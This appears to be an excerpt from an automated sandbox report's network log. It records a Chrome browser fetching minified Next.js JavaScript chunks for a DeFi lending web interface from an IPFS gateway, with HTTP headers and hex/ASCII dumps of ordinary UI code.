                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 49 73 6f 6c 61 74 65 64 20 61 73 73 65 74 73 20 68 61 76 65 20 6c 69 6d 69 74 65 64 20 62 6f 72 72 6f 77 69 6e 67 20 70 6f 77 65 72 20 61 6e 64 20 6f 74 68 65 72 20 61 73 73 65 74 73 20 63 61 6e 6e 6f 74 20 62 65 20 75 73 65 64 20 61 73 20 63 6f 6c 6c 61 74 65 72 61 6c 2e 22 7d 29 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 75 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 74 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 75 2e 6a 73 78 29 28 6c 2e 5a 2c 6a 28 6a 28 7b 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 32 22 2c 73 78 3a 7b 6c 69 6e 65 48 65 69 67 68 74 3a 22 30 2e 37 35 72 65 6d 22 7d 2c 63 6f 6c 6f 72 3a 72 2e 70 61 6c 65 74 74 65 2e 77 61 72 6e 69 6e 67 2e 6d 61 69 6e 7d 2c 6e 29 2c 7b 7d 2c
                                                                                                                                                                                                                                                  Data Ascii: jsx)(i.cC,{id:"Isolated assets have limited borrowing power and other assets cannot be used as collateral."})}),children:(0,u.jsxs)(a.Z,{sx:t,children:[(0,u.jsx)(l.Z,j(j({variant:"secondary12",sx:{lineHeight:"0.75rem"},color:r.palette.warning.main},n),{},
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 61 74 69 6f 6e 2d 6d 6f 64 65 22 2c 66 6f 6e 74 57 65 69 67 68 74 3a 35 30 30 7d 29 7d 7d 29 7d 29 5d 7d 29 7d 7d 2c 39 32 33 39 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 58 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 7d 7d 29 3b 76 61 72 20 74 3d 72 28 35 39 34 39 39 29 2c 69 3d 72 28 34 37 33 30 29 2c 6f 3d 72 28 33 30 31 32 30 29 2c 63 3d 72 28 32 39 36 33 30 29 2c 73 3d 72 28 38 35 38 39 33 29 2c 61 3d 5b 22 63 61 70 74 69 6f 6e 22 2c 22 63 68 69 6c 64 72 65 6e 22 2c 22 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 22 2c 22 63 61 70 74 69 6f 6e 43 6f 6c 6f 72 22 2c 22 61 6c 69 67 6e 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 6e 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66
                                                                                                                                                                                                                                                  Data Ascii: ation-mode",fontWeight:500})}})})]})}},92391:function(e,n,r){r.d(n,{X:function(){return x}});var t=r(59499),i=r(4730),o=r(30120),c=r(29630),s=r(85893),a=["caption","children","captionVariant","captionColor","align"];function l(e,n){var r=Object.keys(e);if
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 73 78 29 28 69 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 6e 2e 65 72 72 6f 72 3f 28 30 2c 73 2e 6a 73 78 73 29 28 73 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 6e 2e 65 72 72 6f 72 2c 22 20 22 2c 28 30 2c 73 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3a 22 74 6f 70 22 7d 2c 76 61 72 69 61 6e 74 3a 22 74 65 78 74 22 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 61 76 69 67 61 74 6f 72 2e 63 6c 69 70 62 6f 61 72 64 2e 77 72 69 74 65 54 65 78 74 28 6e 2e 72 61 77 45 72 72 6f 72 2e 6d 65 73 73 61 67 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28
                                                                                                                                                                                                                                                  Data Ascii: sx)(i.Z,{variant:"description",children:n.error?(0,s.jsxs)(s.Fragment,{children:[n.error," ",(0,s.jsx)(o.Z,{sx:{verticalAlign:"top"},variant:"text",onClick:function(){return navigator.clipboard.writeText(n.rawError.message.toString())},children:(0,s.jsx)(
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1027INData Raw: 72 65 74 75 72 6e 20 65 7d 76 61 72 20 6a 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 6e 65 74 77 6f 72 6b 4e 61 6d 65 2c 72 3d 65 2e 63 68 61 69 6e 49 64 2c 74 3d 65 2e 65 76 65 6e 74 2c 75 3d 65 2e 66 75 6e 6e 65 6c 2c 6a 3d 28 30 2c 73 2e 5a 29 28 29 2c 66 3d 6a 2e 73 77 69 74 63 68 4e 65 74 77 6f 72 6b 2c 68 3d 6a 2e 73 77 69 74 63 68 4e 65 74 77 6f 72 6b 45 72 72 6f 72 2c 6d 3d 28 30 2c 61 2e 59 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 72 61 63 6b 45 76 65 6e 74 7d 29 29 3b 72 65 74 75 72 6e 28 30 2c 78 2e 6a 73 78 29 28 64 2e 76 2c 7b 73 65 76 65 72 69 74 79 3a 22 65 72 72 6f 72 22 2c 69 63 6f 6e 3a 21 31 2c 63 68 69 6c 64 72 65 6e 3a 68 3f 28 30 2c 78 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 63 68 69 6c
                                                                                                                                                                                                                                                  Data Ascii: return e}var j=function(e){var n=e.networkName,r=e.chainId,t=e.event,u=e.funnel,j=(0,s.Z)(),f=j.switchNetwork,h=j.switchNetworkError,m=(0,a.Y)((function(e){return e.trackEvent}));return(0,x.jsx)(d.v,{severity:"error",icon:!1,children:h?(0,x.jsx)(o.Z,{chil


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.549714209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC677OUTGET /_next/static/chunks/7888.4670beb870221fb5.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:38 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 17529
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreif2maztdkcwo3bdbfnieoygqqqavujkxwxxtvo6f5j3d32lsjmpky"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7888.4670beb870221fb5.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreif2maztdkcwo3bdbfnieoygqqqavujkxwxxtvo6f5j3d32lsjmpky
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028472
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 30 38 64 36 37 34 33 64 35 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4008d6743d5-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 38 38 38 5d 2c 7b 34 37 31 33 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 58 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 33 30 31 32 30 29 2c 6f 3d 72 28 39 30 31 34 39 29 2c 69 3d 28 72 28 36 37 32 39 34 29 2c 72 28 37 33 39 36 35 29 29 2c 73 3d 72 28 33 38 37 37 36 29 2c 61 3d 72 28 38 35 38 39 33 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 72 3d 28 30 2c 69 2e 48 54 29 28 29 2c 63 3d 72 2e 75 73 65 72 3b 72
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7888],{47130:function(e,t,r){r.d(t,{X:function(){return c}});var n=r(30120),o=r(90149),i=(r(67294),r(73965)),s=r(38776),a=r(85893),c=function(e){var t=e.children,r=(0,i.HT)(),c=r.user;r
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 57 61 6c 6c 65 74 22 7d 2c 72 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 73 29 28 22 67 22 2c 7b 63 6c 69 70 50 61 74 68 3a 22 75 72 6c 28 23 63 6c 69 70 30 5f 33 37 31 39 5f 33 33 32 33 29 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 22 32 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 37 2e 33 32 30 33 20 31 37 2e 33 39 38 48 33 2e 33 32 30 33 31 43 32 2e 37 38 39 38 38 20 31 37 2e 33 39 38 20 32 2e 32 38 31 31 37 20 31 37 2e 31 38 37 32 20 31 2e 39 30 36 31 20 31 36 2e 38 31 32 32 43 31 2e 35 33 31 30 33 20 31 36 2e 34 33 37 31 20
                                                                                                                                                                                                                                                  Data Ascii: lns:"http://www.w3.org/2000/svg","aria-label":"Wallet"},r),{},{children:[(0,s.jsxs)("g",{clipPath:"url(#clip0_3719_3323)",strokeWidth:"2",children:[(0,s.jsx)("path",{d:"M17.3203 17.398H3.32031C2.78988 17.398 2.28117 17.1872 1.9061 16.8122C1.53103 16.4371
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 30 36 43 31 2e 34 36 35 37 35 20 35 2e 30 36 34 36 32 20 31 2e 33 32 30 32 31 20 35 2e 34 39 33 31 32 20 31 2e 33 32 30 33 31 20 35 2e 39 33 33 39 33 56 36 2e 33 39 37 39 33 22 7d 29 5d 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 22 64 65 66 73 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28 22 63 6c 69 70 50 61 74 68 22 2c 7b 69 64 3a 22 63 6c 69 70 30 5f 33 37 31 39 5f 33 33 32 33 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28 22 72 65 63 74 22 2c 7b 77 69 64 74 68 3a 22 32 30 22 2c 68 65 69 67 68 74 3a 22 31 39 22 2c 66 69 6c 6c 3a 22 77 68 69 74 65 22 2c 74 72 61 6e 73 66 6f 72 6d 3a 22 74 72 61 6e 73 6c 61 74 65 28 30 2e 33 32 30 33 31 32 29 22 7d 29 7d 29 7d 29 5d 7d 29 29 7d 7d 2c 34 31 30 32 34 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                  Data Ascii: 06C1.46575 5.06462 1.32021 5.49312 1.32031 5.93393V6.39793"})]}),(0,s.jsx)("defs",{children:(0,s.jsx)("clipPath",{id:"clip0_3719_3323",children:(0,s.jsx)("rect",{width:"20",height:"19",fill:"white",transform:"translate(0.320312)"})})})]}))}},41024:functio
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 65 74 75 72 6e 20 6f 26 26 28 6d 3d 4d 61 74 68 2e 74 72 75 6e 63 28 4e 75 6d 62 65 72 28 6d 29 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 6e 29 29 2f 4d 61 74 68 2e 70 6f 77 28 31 30 2c 6e 29 29 2c 7b 70 72 65 66 69 78 3a 6e 65 77 20 49 6e 74 6c 2e 4e 75 6d 62 65 72 46 6f 72 6d 61 74 28 22 65 6e 2d 55 53 22 2c 7b 6d 61 78 69 6d 75 6d 46 72 61 63 74 69 6f 6e 44 69 67 69 74 73 3a 6e 2c 6d 69 6e 69 6d 75 6d 46 72 61 63 74 69 6f 6e 44 69 67 69 74 73 3a 6e 7d 29 2e 66 6f 72 6d 61 74 28 6d 29 2c 70 6f 73 74 66 69 78 3a 75 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 76 61 72 20 74 3d 65 2e 76 61 6c 75 65 2c 72 3d 65 2e 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 2c 6e 3d 65 2e 72 6f 75 6e 64 44 6f 77 6e 2c 6f 3d 6d 28 7b 76 61 6c 75 65 3a 74 2c 76 69 73 69
                                                                                                                                                                                                                                                  Data Ascii: eturn o&&(m=Math.trunc(Number(m)*Math.pow(10,n))/Math.pow(10,n)),{prefix:new Intl.NumberFormat("en-US",{maximumFractionDigits:n,minimumFractionDigits:n}).format(m),postfix:u}};function p(e){var t=e.value,r=e.visibleDecimals,n=e.roundDown,o=m({value:t,visi
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 6a 73 78 29 28 73 2e 5a 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 73 70 61 6e 22 2c 73 78 3a 7b 6d 6c 3a 2e 35 7d 2c 76 61 72 69 61 6e 74 3a 64 7c 7c 62 2e 76 61 72 69 61 6e 74 2c 63 6f 6c 6f 72 3a 6d 7c 7c 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 22 25 22 7d 29 2c 22 75 73 64 22 21 3d 3d 28 6e 75 6c 6c 3d 3d 3d 72 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 72 26 26 28 30 2c 61 2e 6a 73 78 29 28 73 2e 5a 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 73 70 61 6e 22 2c 73 78 3a 7b 6d 6c 3a 2e 35 7d 2c 76 61 72 69 61 6e 74 3a 64 7c 7c 62 2e 76 61 72 69 61 6e 74 2c 63 6f 6c 6f 72 3a 6d 7c 7c 22 74 65
                                                                                                                                                                                                                                                  Data Ascii: jsx)(s.Z,{component:"span",sx:{ml:.5},variant:d||b.variant,color:m||"text.secondary",children:"%"}),"usd"!==(null===r||void 0===r?void 0:r.toLowerCase())&&"undefined"!==typeof r&&(0,a.jsx)(s.Z,{component:"span",sx:{ml:.5},variant:d||b.variant,color:m||"te
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 75 72 72 65 6e 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 26 26 65 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 69 66 28 6e 29 7b 76 61 72 20 74 2c 73 2c 63 2c 6c 2c 75 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 6f 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 6e 75 6c 6c 3d 3d 3d 28 73 3d 74 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 73 7c 7c 6e 75 6c 6c 3d 3d 3d 28 63 3d 73 2e 63 68 69 6c 64 4e 6f 64 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 5b 30 5d 2c 64 3d 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 77 69 64 74 68 22 29 2c 6d 3d 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 65 69 67 68 74 22 29 2c 70 3d 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 76
                                                                                                                                                                                                                                                  Data Ascii: urrent)&&void 0!==e&&e.contentDocument)if(n){var t,s,c,l,u=null===(t=o.current)||void 0===t||null===(s=t.contentDocument)||void 0===s||null===(c=s.childNodes)||void 0===c?void 0:c[0],d=u.getAttribute("width"),m=u.getAttribute("height"),p=u.getAttribute("v
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 69 65 6e 74 22 2c 7b 69 64 3a 22 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 22 2c 78 31 3a 22 2e 38 34 33 22 2c 78 32 3a 22 2e 32 30 36 22 2c 79 31 3a 22 2e 31 33 35 22 2c 79 32 3a 22 2e 38 38 36 22 2c 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3a 22 6f 62 6a 65 63 74 42 6f 75 6e 64 69 6e 67 42 6f 78 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 64 2e 6a 73 78 29 28 22 73 74 6f 70 22 2c 7b 6f 66 66 73 65 74 3a 22 30 22 2c 73 74 6f 70 43 6f 6c 6f 72 3a 22 23 62 36 35 30 39 65 22 2c 69 64 3a 22 73 74 6f 70 32 22 7d 29 2c 28 30 2c 64 2e 6a 73 78 29 28 22 73 74 6f 70 22 2c 7b 6f 66 66 73 65 74 3a 22 31 22 2c 73 74 6f 70 43 6f 6c 6f 72 3a 22 23 32 65 62 61 63 36 22 2c 69 64 3a 22 73 74 6f 70 34 22 7d 29 5d 7d 29 2c 28 30 2c 64 2e 6a 73 78 29 28 22 6c 69 6e 65 61
                                                                                                                                                                                                                                                  Data Ascii: ient",{id:"linear-gradient",x1:".843",x2:".206",y1:".135",y2:".886",gradientUnits:"objectBoundingBox",children:[(0,d.jsx)("stop",{offset:"0",stopColor:"#b6509e",id:"stop2"}),(0,d.jsx)("stop",{offset:"1",stopColor:"#2ebac6",id:"stop4"})]}),(0,d.jsx)("linea
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 30 20 30 20 34 31 2e 33 39 33 2d 35 30 2e 32 37 38 20 31 31 33 2e 37 34 31 20 31 31 33 2e 37 34 31 20 30 20 30 20 30 20 36 2e 36 35 39 2d 32 31 2e 34 35 33 20 31 31 35 2e 34 20 31 31 35 2e 34 20 30 20 30 20 30 20 30 2d 34 36 2e 30 36 35 20 31 31 33 2e 36 36 32 20 31 31 33 2e 36 36 32 20 30 20 30 20 30 2d 31 37 2e 32 2d 34 30 2e 38 36 35 41 31 31 34 2e 36 31 39 20 31 31 34 2e 36 31 39 20 30 20 30 20 30 20 31 37 32 2e 34 38 35 20 32 32 2e 37 61 31 31 33 2e 37 34 20 31 31 33 2e 37 34 20 30 20 30 20 30 2d 32 31 2e 34 35 33 2d 36 2e 36 35 39 41 31 31 35 2e 31 34 35 20 31 31 35 2e 31 34 35 20 30 20 30 20 30 20 31 32 38 20 31 33 2e 37 31 34 7a 22 7d 29 2c 72 26 26 28 30 2c 64 2e 6a 73 78 29 28 22 69 6d 61 67 65 22 2c 7b 78 3a 22 32 35 22 2c 79 3a 22 32 35 22 2c
                                                                                                                                                                                                                                                  Data Ascii: 0 0 41.393-50.278 113.741 113.741 0 0 0 6.659-21.453 115.4 115.4 0 0 0 0-46.065 113.662 113.662 0 0 0-17.2-40.865A114.619 114.619 0 0 0 172.485 22.7a113.74 113.74 0 0 0-21.453-6.659A115.145 115.145 0 0 0 128 13.714z"}),r&&(0,d.jsx)("image",{x:"25",y:"25",
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 30 2c 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 28 6a 2c 68 28 68 28 7b 7d 2c 6e 29 2c 7b 7d 2c 7b 6b 65 79 3a 65 2c 73 79 6d 62 6f 6c 3a 65 2c 73 78 3a 68 28 7b 6d 6c 3a 30 3d 3d 3d 74 3f 30 3a 22 63 61 6c 63 28 2d 31 20 2a 20 30 2e 35 65 6d 29 22 7d 2c 6e 2e 73 78 29 7d 29 29 7d 29 29 7d 29 3a 28 30 2c 64 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 74 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 30 2c 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 28 6a 2c 68 28 68 28 7b 7d 2c 6e 29 2c 7b 7d
                                                                                                                                                                                                                                                  Data Ascii: (function(e,t){return(0,l.createElement)(j,h(h({},n),{},{key:e,symbol:e,sx:h({ml:0===t?0:"calc(-1 * 0.5em)"},n.sx)}))}))}):(0,d.jsx)(a.Z,{sx:{display:"inline-flex",position:"relative"},children:t.map((function(e,t){return(0,l.createElement)(j,h(h({},n),{}


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.549713209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:38 UTC676OUTGET /_next/static/chunks/797.224fdb0a57599ef0.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:38 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 46641
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigib2gvyuhhedfdj3b3c4aznwbgtbywjkoiqflgq57d3wqam4yy7m"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/797.224fdb0a57599ef0.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigib2gvyuhhedfdj3b3c4aznwbgtbywjkoiqflgq57d3wqam4yy7m
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028472
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 30 36 39 33 31 63 34 38 31 2d 45 57 52 0d 0a 0d 0a
